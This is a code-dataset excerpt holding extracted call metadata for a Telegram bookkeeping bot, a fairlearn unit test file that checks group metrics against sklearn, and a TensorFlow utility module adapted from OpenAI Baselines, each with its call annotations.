beancount_bot.i18n import _\n'), ((153, 22, 153, 35), 'beancount_bot.transaction.get_manager', 'get_manager', ({}, {}), '()', False, 'from beancount_bot.transaction import get_manager\n'), ((156, 8, 156, 56), 'beancount_bot.util.logger.error', 'logger.error', ({(156, 21, 156, 52): 'f"""{call.id}:Unknown error!"""', (156, 54, 156, 55): 'e'}, {}), "(f'{call.id}:Unknown error!', e)", False, 'from beancount_bot.util import logger\n'), ((169, 30, 169, 71), 'beancount_bot.i18n._', '_', ({(169, 32, 169, 70): '"""Please conduct authentication first!"""'}, {}), "('Please conduct authentication first!')", False, 'from beancount_bot.i18n import _\n'), ((213, 30, 213, 54), 'beancount_bot.transaction.stringfy', 'transaction.stringfy', ({(213, 51, 213, 53): 'tx'}, {}), '(tx)', False, 'from beancount_bot import transaction\n'), ((215, 8, 215, 78), 'beancount_bot.util.logger.info', 'logger.info', ({(215, 20, 215, 74): 'f"""{message.from_user.id}:Unable to add transactions"""', (215, 76, 215, 77): 'e'}, {}), "(f'{message.from_user.id}:Unable to add transactions', e)", False, 'from beancount_bot.util import logger\n'), ((218, 8, 218, 100), 'beancount_bot.util.logger.error', 'logger.error', ({(218, 21, 218, 96): 'f"""{message.from_user.id}:An unknown mistake!Adding a transaction failed."""', (218, 98, 218, 99): 'e'}, {}), "(\n f'{message.from_user.id}:An unknown mistake!Adding a transaction failed.',\n e)", False, 'from beancount_bot.util import logger\n'), ((231, 43, 231, 86), 'beancount_bot.i18n._', '_', ({(231, 45, 231, 85): '"""Please conduct authentication first!"""'}, {}), "('Please conduct authentication first!')", False, 'from beancount_bot.i18n import _\n'), ((245, 8, 245, 63), 'beancount_bot.util.logger.info', 'logger.info', ({(245, 20, 245, 59): 'f"""{call.id}:Unable to create trading"""', (245, 61, 245, 62): 'e'}, {}), "(f'{call.id}:Unable to create trading', e)", False, 'from beancount_bot.util import logger\n'), ((248, 8, 248, 96), 'beancount_bot.util.logger.error', 'logger.error', ({(248, 21, 248, 92): 'f"""{call.id}:An unknown mistake!Withdrawal of the transaction failed."""', (248, 94, 248, 95): 'e'}, {}), "(\n f'{call.id}:An unknown mistake!Withdrawal of the transaction failed.', e)", False, 'from beancount_bot.util import logger\n'), ((109, 23, 109, 82), 'telebot.types.InlineKeyboardButton', 'InlineKeyboardButton', (), '', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, MessageEntity, Message, CallbackQuery\n'), ((118, 12, 118, 174), 'beancount_bot.i18n._', '_', ({(118, 14, 118, 173): '"""Account bill Bot\n\nAvailable instruction list:\n{command}\n\nTrade statement syntax help, select the corresponding module,Use /help [Module name] Check."""'}, {}), '("""Account bill Bot\n\nAvailable instruction list:\n{command}\n\nTrade statement syntax help, select the corresponding module,Use /help [Module name] Check."""\n )', False, 'from beancount_bot.i18n import _\n'), ((130, 34, 130, 118), 'beancount_bot.i18n._', '_', ({(130, 36, 130, 117): '"""The corresponding name of the transaction statement processor does not exist!"""'}, {}), "('The corresponding name of the transaction statement processor does not exist!'\n )", False, 'from beancount_bot.i18n import _\n'), ((157, 21, 157, 43), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n'), ((184, 34, 184, 61), 'beancount_bot.i18n._', '_', ({(184, 36, 184, 60): '"""Task does not exist!"""'}, {}), "('Task does not exist!')", False, 'from beancount_bot.i18n import _\n'), ((211, 40, 211, 59), 'beancount_bot.i18n._', '_', ({(211, 42, 211, 58): '"""Revoke trading"""'}, {}), "('Revoke trading')", False, 'from beancount_bot.i18n import _\n'), ((249, 43, 249, 104), 'beancount_bot.i18n._', '_', ({(249, 45, 249, 103): '"""An unknown mistake!Withdrawal of the transaction failed."""'}, {}), "('An unknown mistake!Withdrawal of the transaction failed.')", False, 'from beancount_bot.i18n import _\n'), ((108, 23, 108, 41), 'beancount_bot.i18n._', '_', ({(108, 25, 108, 40): '"""help:{name}"""'}, {}), "('help:{name}')", False, 'from beancount_bot.i18n import _\n'), ((178, 21, 179, 71), 'beancount_bot.i18n._', '_', ({(178, 23, 179, 70): '"""Current registration task:{all_tasks}\nable to pass /task [Task Name] Active trigger"""'}, {}), '("""Current registration task:{all_tasks}\nable to pass /task [Task Name] Active trigger"""\n )', False, 'from beancount_bot.i18n import _\n'), ((158, 66, 158, 88), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n'), ((219, 84, 219, 106), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n')] |
GeGao2014/fairlearn | test/unit/metrics/test_group_sklearn_wrappers.py | b0841c8b07ead6a285bdbc0ea61cac2338cbc96e | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import pytest
import numpy as np
import sklearn.metrics as skm
import fairlearn.metrics as metrics
# ======================================================
a = "a"
b = "b"
c = "c"
Y_true = [0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
Y_pred = [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
Y_true_ternary = [a, b, c, c, c, b, b, b, c, c, a, a, a, a, a, b, c, c]
Y_pred_ternary = [b, c, c, c, b, b, b, b, b, c, a, a, c, a, a, b, c, c]
groups = [3, 4, 1, 0, 0, 0, 3, 2, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4]
weight = [1, 2, 3, 1, 2, 3, 4, 2, 3, 3, 2, 1, 2, 3, 1, 2, 3, 4]
group2 = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
# =======================================================
# Define as a dictionary so that the actual name can be seen
# when pytest builds the tests
supported_metrics_weighted = [(skm.accuracy_score, metrics.group_accuracy_score),
(skm.confusion_matrix, metrics.group_confusion_matrix),
(skm.zero_one_loss, metrics.group_zero_one_loss)]
# The following only work with binary data when called with their default arguments
supported_metrics_weighted_binary = [(skm.precision_score, metrics.group_precision_score),
(skm.recall_score, metrics.group_recall_score),
(skm.roc_auc_score, metrics.group_roc_auc_score),
(skm.mean_squared_error, metrics.group_mean_squared_error),
(skm.r2_score, metrics.group_r2_score)]
supported_metrics_weighted_binary = supported_metrics_weighted_binary + supported_metrics_weighted
metrics_no_sample_weights = [(skm.max_error, metrics.group_max_error),
(skm.mean_absolute_error, metrics.group_mean_absolute_error),
(skm.mean_squared_log_error, metrics.group_mean_squared_log_error),
(skm.median_absolute_error, metrics.group_median_absolute_error)]
supported_metrics_unweighted = metrics_no_sample_weights + supported_metrics_weighted_binary
# =======================================================
@pytest.mark.parametrize("func_tuple", supported_metrics_unweighted)
def test_metric_unweighted(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true, Y_pred, groups)
# We don't really care about the numbers (sklearn is responsible)
# We just want to make sure we got a result
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true, Y_pred)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
@pytest.mark.parametrize("func_tuple", supported_metrics_weighted_binary)
def test_metric_weighted(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true, Y_pred, groups, sample_weight=weight)
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true, Y_pred, sample_weight=weight)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
@pytest.mark.parametrize("func_tuple", supported_metrics_weighted)
def test_metric_weighted_ternary(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true_ternary, Y_pred_ternary, groups, sample_weight=weight)
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true_ternary, Y_pred_ternary, sample_weight=weight)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
# ======================================================================================
def test_group_accuracy_score_unnormalized():
result = metrics.group_accuracy_score(Y_true, Y_pred, groups, normalize=False)
expected_overall = skm.accuracy_score(Y_true, Y_pred, False)
assert result.overall == expected_overall
# ======================================================================================
def test_group_confusion_matrix_labels():
labels = [0, 4]
result = metrics.group_confusion_matrix(Y_true, Y_pred, groups, labels=labels)
expected_overall = skm.confusion_matrix(Y_true, Y_pred, labels=labels)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_precision_score_ternary():
result = metrics.group_precision_score(Y_true_ternary, Y_pred_ternary, group2, average=None)
expected_overall = skm.precision_score(Y_true_ternary, Y_pred_ternary, average=None)
assert np.array_equal(result.overall, expected_overall)
def test_group_precision_score_pos_label():
result = metrics.group_precision_score(Y_true, Y_pred, groups, pos_label=0)
expected_overall = skm.precision_score(Y_true, Y_pred, pos_label=0)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_recall_score_ternary():
result = metrics.group_recall_score(Y_true_ternary, Y_pred_ternary, group2, average=None)
expected_overall = skm.recall_score(Y_true_ternary, Y_pred_ternary, average=None)
assert np.array_equal(result.overall, expected_overall)
def test_group_recall_score_pos_label():
result = metrics.group_recall_score(Y_true, Y_pred, groups, pos_label=0)
expected_overall = skm.recall_score(Y_true, Y_pred, pos_label=0)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_roc_auc_score_average():
result = metrics.group_roc_auc_score(Y_true, Y_pred, groups, average='samples')
expected_overall = skm.roc_auc_score(Y_true, Y_pred, average='samples')
assert expected_overall == result.overall
def test_group_roc_auc_score_max_fpr():
result = metrics.group_roc_auc_score(Y_true, Y_pred, groups, max_fpr=0.5)
expected_overall = skm.roc_auc_score(Y_true, Y_pred, max_fpr=0.5)
assert expected_overall == result.overall
# ======================================================================================
def test_group_zero_one_loss_unnormalized():
result = metrics.group_zero_one_loss(Y_true, Y_pred, groups, normalize=False)
expected_overall = skm.zero_one_loss(Y_true, Y_pred, False)
assert result.overall == expected_overall
# =============================================================================================
def test_group_mean_squared_error_multioutput_single_ndarray():
y_t = np.random.rand(len(groups), 2)
y_p = np.random.rand(len(groups), 2)
result = metrics.group_mean_squared_error(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.mean_squared_error(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
# =============================================================================================
def test_group_r2_score_multioutput():
y_t = np.random.rand(len(groups), 2)
y_p = np.random.rand(len(groups), 2)
result = metrics.group_r2_score(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.r2_score(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
for target_group in np.unique(groups):
mask = np.asarray(groups) == target_group
expected = skm.r2_score(y_t[mask], y_p[mask], multioutput='raw_values')
assert np.array_equal(result.by_group[target_group], expected)
# =============================================================================================
def test_group_mean_squared_error_multioutput_list_ndarray():
y_t = [np.random.rand(2) for x in groups]
y_p = [np.random.rand(2) for x in groups]
result = metrics.group_mean_squared_error(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.mean_squared_error(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
for target_group in np.unique(groups):
y_true = []
y_pred = []
for i in range(len(groups)):
if groups[i] == target_group:
y_true.append(y_t[i])
y_pred.append(y_p[i])
expected = skm.mean_squared_error(y_true, y_pred, multioutput='raw_values')
assert np.array_equal(result.by_group[target_group], expected)
| [((54, 1, 54, 68), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(54, 25, 54, 37): '"""func_tuple"""', (54, 39, 54, 67): 'supported_metrics_unweighted'}, {}), "('func_tuple', supported_metrics_unweighted)", False, 'import pytest\n'), ((71, 1, 71, 73), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(71, 25, 71, 37): '"""func_tuple"""', (71, 39, 71, 72): 'supported_metrics_weighted_binary'}, {}), "('func_tuple', supported_metrics_weighted_binary)", False, 'import pytest\n'), ((86, 1, 86, 66), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(86, 25, 86, 37): '"""func_tuple"""', (86, 39, 86, 65): 'supported_metrics_weighted'}, {}), "('func_tuple', supported_metrics_weighted)", False, 'import pytest\n'), ((104, 13, 104, 82), 'fairlearn.metrics.group_accuracy_score', 'metrics.group_accuracy_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((106, 23, 106, 64), 'sklearn.metrics.accuracy_score', 'skm.accuracy_score', ({(106, 42, 106, 48): 'Y_true', (106, 50, 106, 56): 'Y_pred', (106, 58, 106, 63): 'False'}, {}), '(Y_true, Y_pred, False)', True, 'import sklearn.metrics as skm\n'), ((116, 13, 116, 82), 'fairlearn.metrics.group_confusion_matrix', 'metrics.group_confusion_matrix', (), '', True, 'import fairlearn.metrics as metrics\n'), ((117, 23, 117, 74), 'sklearn.metrics.confusion_matrix', 'skm.confusion_matrix', (), '', True, 'import sklearn.metrics as skm\n'), ((119, 11, 119, 59), 'numpy.array_equal', 'np.array_equal', ({(119, 26, 119, 40): 'result.overall', (119, 42, 119, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((125, 13, 125, 96), 'fairlearn.metrics.group_precision_score', 'metrics.group_precision_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((126, 23, 126, 88), 'sklearn.metrics.precision_score', 'skm.precision_score', (), '', True, 'import sklearn.metrics as skm\n'), ((128, 11, 128, 59), 'numpy.array_equal', 'np.array_equal', ({(128, 26, 128, 40): 'result.overall', (128, 42, 128, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((132, 13, 132, 79), 'fairlearn.metrics.group_precision_score', 'metrics.group_precision_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((133, 23, 133, 71), 'sklearn.metrics.precision_score', 'skm.precision_score', (), '', True, 'import sklearn.metrics as skm\n'), ((135, 11, 135, 59), 'numpy.array_equal', 'np.array_equal', ({(135, 26, 135, 40): 'result.overall', (135, 42, 135, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((141, 13, 141, 93), 'fairlearn.metrics.group_recall_score', 'metrics.group_recall_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((142, 23, 142, 85), 'sklearn.metrics.recall_score', 'skm.recall_score', (), '', True, 'import sklearn.metrics as skm\n'), ((144, 11, 144, 59), 'numpy.array_equal', 'np.array_equal', ({(144, 26, 144, 40): 'result.overall', (144, 42, 144, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((148, 13, 148, 76), 'fairlearn.metrics.group_recall_score', 'metrics.group_recall_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((149, 23, 149, 68), 'sklearn.metrics.recall_score', 'skm.recall_score', (), '', True, 'import sklearn.metrics as skm\n'), ((151, 11, 151, 59), 'numpy.array_equal', 'np.array_equal', ({(151, 26, 151, 40): 'result.overall', (151, 42, 151, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((157, 13, 157, 83), 'fairlearn.metrics.group_roc_auc_score', 'metrics.group_roc_auc_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((158, 23, 158, 75), 'sklearn.metrics.roc_auc_score', 'skm.roc_auc_score', (), '', True, 'import sklearn.metrics as skm\n'), ((164, 13, 164, 77), 'fairlearn.metrics.group_roc_auc_score', 'metrics.group_roc_auc_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((165, 23, 165, 69), 'sklearn.metrics.roc_auc_score', 'skm.roc_auc_score', (), '', True, 'import sklearn.metrics as skm\n'), ((173, 13, 173, 81), 'fairlearn.metrics.group_zero_one_loss', 'metrics.group_zero_one_loss', (), '', True, 'import fairlearn.metrics as metrics\n'), ((175, 23, 175, 63), 'sklearn.metrics.zero_one_loss', 'skm.zero_one_loss', ({(175, 41, 175, 47): 'Y_true', (175, 49, 175, 55): 'Y_pred', (175, 57, 175, 62): 'False'}, {}), '(Y_true, Y_pred, False)', True, 'import sklearn.metrics as skm\n'), ((185, 13, 185, 89), 'fairlearn.metrics.group_mean_squared_error', 'metrics.group_mean_squared_error', (), '', True, 'import fairlearn.metrics as metrics\n'), ((187, 23, 187, 81), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (), '', True, 'import sklearn.metrics as skm\n'), ((189, 11, 189, 59), 'numpy.array_equal', 'np.array_equal', ({(189, 26, 189, 40): 'result.overall', (189, 42, 189, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((197, 13, 197, 79), 'fairlearn.metrics.group_r2_score', 'metrics.group_r2_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((199, 23, 199, 71), 'sklearn.metrics.r2_score', 'skm.r2_score', (), '', True, 'import sklearn.metrics as skm\n'), ((201, 11, 201, 59), 'numpy.array_equal', 'np.array_equal', ({(201, 26, 201, 40): 'result.overall', (201, 42, 201, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((202, 24, 202, 41), 'numpy.unique', 'np.unique', ({(202, 34, 202, 40): 'groups'}, {}), '(groups)', True, 'import numpy as np\n'), ((213, 13, 213, 89), 'fairlearn.metrics.group_mean_squared_error', 'metrics.group_mean_squared_error', (), '', True, 'import fairlearn.metrics as metrics\n'), ((215, 23, 215, 81), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (), '', True, 'import sklearn.metrics as skm\n'), ((217, 11, 217, 59), 'numpy.array_equal', 'np.array_equal', ({(217, 26, 217, 40): 'result.overall', (217, 42, 217, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((219, 24, 219, 41), 'numpy.unique', 'np.unique', ({(219, 34, 219, 40): 'groups'}, {}), '(groups)', True, 'import numpy as np\n'), ((66, 15, 66, 63), 'numpy.array_equal', 'np.array_equal', ({(66, 30, 66, 46): 'expected_overall', (66, 48, 66, 62): 'result.overall'}, {}), '(expected_overall, result.overall)', True, 'import numpy as np\n'), ((81, 15, 81, 63), 'numpy.array_equal', 'np.array_equal', ({(81, 30, 81, 46): 'expected_overall', (81, 48, 81, 62): 'result.overall'}, {}), '(expected_overall, result.overall)', True, 'import numpy as np\n'), ((96, 15, 96, 63), 'numpy.array_equal', 'np.array_equal', ({(96, 30, 96, 46): 'expected_overall', (96, 48, 96, 62): 'result.overall'}, {}), '(expected_overall, result.overall)', True, 'import numpy as np\n'), ((204, 19, 204, 79), 'sklearn.metrics.r2_score', 'skm.r2_score', (), '', True, 'import sklearn.metrics as skm\n'), ((205, 15, 205, 70), 'numpy.array_equal', 'np.array_equal', ({(205, 30, 205, 59): 'result.by_group[target_group]', (205, 61, 205, 69): 'expected'}, {}), '(result.by_group[target_group], expected)', True, 'import numpy as np\n'), ((211, 11, 211, 28), 'numpy.random.rand', 'np.random.rand', ({(211, 26, 211, 27): '(2)'}, {}), '(2)', True, 'import numpy as np\n'), ((212, 11, 212, 28), 'numpy.random.rand', 'np.random.rand', ({(212, 26, 212, 27): '(2)'}, {}), '(2)', True, 'import numpy as np\n'), ((226, 19, 226, 83), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (), '', True, 'import sklearn.metrics as skm\n'), ((227, 15, 227, 70), 'numpy.array_equal', 'np.array_equal', ({(227, 30, 227, 59): 'result.by_group[target_group]', (227, 61, 227, 69): 'expected'}, {}), '(result.by_group[target_group], expected)', True, 'import numpy as np\n'), ((203, 15, 203, 33), 'numpy.asarray', 'np.asarray', ({(203, 26, 203, 32): 'groups'}, {}), '(groups)', True, 'import numpy as np\n')] |
cbschaff/nlimb | deeplearning/tf_util.py | f0564b00bab1b3367aaa88163e49bebc88f349bb | """
Adapted from OpenAI Baselines.
"""
import numpy as np
import tensorflow as tf # pylint: ignore-module
import random
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def make_session(num_cpu=None, make_default=False):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
tf_config.gpu_options.allocator_type = 'BFC'
if make_default:
return tf.InteractiveSession(config=tf_config)
else:
return tf.Session(config=tf_config)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
tf.get_default_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Saving variables and setting up experiment directories
# ================================================================
def load_state(fname):
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname):
os.makedirs(os.path.dirname(fname), exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
def load(fname):
import cloudpickle
with open(fname, 'rb') as f:
return cloudpickle.load(f)
def save(fname, obj):
import cloudpickle
os.makedirs(os.path.dirname(fname), exist_ok=True)
with open(fname, 'wb') as fh:
cloudpickle.dump(obj, fh)
class Experiment(object):
def __init__(self, logdir):
self.logdir = logdir
os.makedirs(os.path.join(logdir, 'checkpoints'), exist_ok=True)
def load(self, timestep=None):
if timestep is None:
# get latest ckpt
import glob
fs = glob.glob(os.path.join(self.logdir, 'checkpoints/*'))
timesteps = []
for f in fs:
try: timesteps.append(int(os.path.basename(f)))
except: pass
if len(timesteps) == 0:
return 0
timestep = max(timesteps)
fname = os.path.join(self.logdir, 'checkpoints', str(timestep), 'model')
load_state(fname)
return timestep
def save(self, timestep):
fname = os.path.join(self.logdir, 'checkpoints', str(timestep), 'model')
save_state(fname)
def load_model_fn(self):
fname = os.path.join(self.logdir, 'checkpoints/model_fn.pkl')
assert os.path.exists(fname), "No model file saved."
return load(fname)
def save_model_fn(self, model_fn):
fname = os.path.join(self.logdir, 'checkpoints/model_fn.pkl')
save(fname, model_fn)
# ================================================================
# Model components
# ================================================================
def batch_to_seq(h, nbatch, nsteps, flat=False):
"""
Assumes Time major data!!
x.shape = [nsteps, nbatch, *obs_shape]
h = x.reshape([-1, *x.shape[2:]]))
"""
if flat:
h = tf.reshape(h, [nsteps, nbatch])
else:
h = tf.reshape(h, [nsteps, nbatch, -1])
return [tf.squeeze(v, [0]) for v in tf.split(axis=0, num_or_size_splits=nsteps, value=h)]
def seq_to_batch(h, flat = False):
"""
Assumes Time major data!!
x.shape = [nsteps, nbatch, *obs_shape]
x = output.reshape(nsteps, nbatch, *obs_shape), where output is the output of this function.
"""
shape = h[0].get_shape().as_list()
if not flat:
assert(len(shape) > 1)
nh = h[0].get_shape()[-1].value
return tf.reshape(tf.concat(axis=0, values=h), [-1, nh])
else:
return tf.reshape(tf.stack(values=h, axis=0), [-1])
def ortho_init(scale=1.0):
def _ortho_init(shape, dtype, partition_info=None):
#lasagne ortho init for tf
shape = tuple(shape)
if len(shape) == 2:
flat_shape = shape
elif len(shape) == 4: # assumes NHWC
flat_shape = (np.prod(shape[:-1]), shape[-1])
else:
raise NotImplementedError
a = np.random.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v # pick the one with the correct shape
q = q.reshape(shape)
return (scale * q[:shape[0], :shape[1]]).astype(np.float32)
return _ortho_init
def normc_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def lstm(xs, ms, s, scope, nh, init_scale=1.0):
nbatch, nin = [v.value for v in xs[0].get_shape()]
nsteps = len(xs)
with tf.variable_scope(scope):
wx = tf.get_variable("wx", [nin, nh*4], initializer=ortho_init(init_scale))
wh = tf.get_variable("wh", [nh, nh*4], initializer=ortho_init(init_scale))
b = tf.get_variable("b", [nh*4], initializer=tf.constant_initializer(0.0))
c, h = tf.split(axis=1, num_or_size_splits=2, value=s)
for idx, (x, m) in enumerate(zip(xs, ms)):
c = c*(1-m)
h = h*(1-m)
z = tf.matmul(x, wx) + tf.matmul(h, wh) + b
i, f, o, u = tf.split(axis=1, num_or_size_splits=4, value=z)
i = tf.nn.sigmoid(i)
f = tf.nn.sigmoid(f)
o = tf.nn.sigmoid(o)
u = tf.tanh(u)
c = f*c + i*u
h = o*tf.tanh(c)
xs[idx] = h
s = tf.concat(axis=1, values=[c, h])
return xs, s
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
# for inpt in inputs:
# if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
# assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = value
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
if value is not None:
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = feed_dict.get(inpt, self.givens[inpt])
results = tf.get_default_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads, _ = tf.clip_by_global_norm(grads, clip_norm=clip_norm)
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
def reset():
global ALREADY_INITIALIZED
ALREADY_INITIALIZED = set()
tf.reset_default_graph()
"""
Random Seeds
"""
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
